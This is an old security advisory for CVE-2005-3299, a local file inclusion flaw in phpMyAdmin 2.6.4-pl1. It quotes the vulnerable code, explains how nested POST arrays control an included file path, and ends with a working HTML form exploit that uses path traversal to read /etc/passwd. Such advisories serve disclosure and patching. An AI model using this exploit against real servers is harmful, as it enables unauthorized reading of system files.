phpMyAdmin Local file inclusion 2.6.4-pl1

Published
Credit
Risk
2005.10.10
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
N/A
CVE-2005-3299
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz
Date: 10.10.2005

- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is very dangerous script.

- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php

This file is included by many files. Example file index.php

- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
* Gets core libraries and defines some variables
*/
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--

ok so. In ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
require('./' . $__redirect);
exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------

But before we have

- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
// if a subform is present and should be used
// the rest of the form is deprecated
$subform_id = key( $_POST['usesubform'] );
$subform = $_POST['subform'][$subform_id];
$_POST = $subform;
if ( isset( $_POST['redirect'] )
&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
$__redirect = $_POST['redirect'];
unset( $_POST['redirect'] );
} // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------

If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).

$subform = $_POST['subform'][$subform_id];
$_POST = $subform;

where array $_POST = array $_POST[subform][1]
that
$_POST['redirect']=$_POST[subform][1][redirect]

and we have local file inclusion.

Example response in html:

- -Exploit---
<CENTER>
<A HREF="http://cxsecurity.com><IMG SRC="http://cxsecurity.com/gfx/small_logo.png"></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---

Exploit:
http://cxsecurity.com/cxexploit/2


- --- 2.Contact ---
Author: Maksymilian Arciemowicz


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com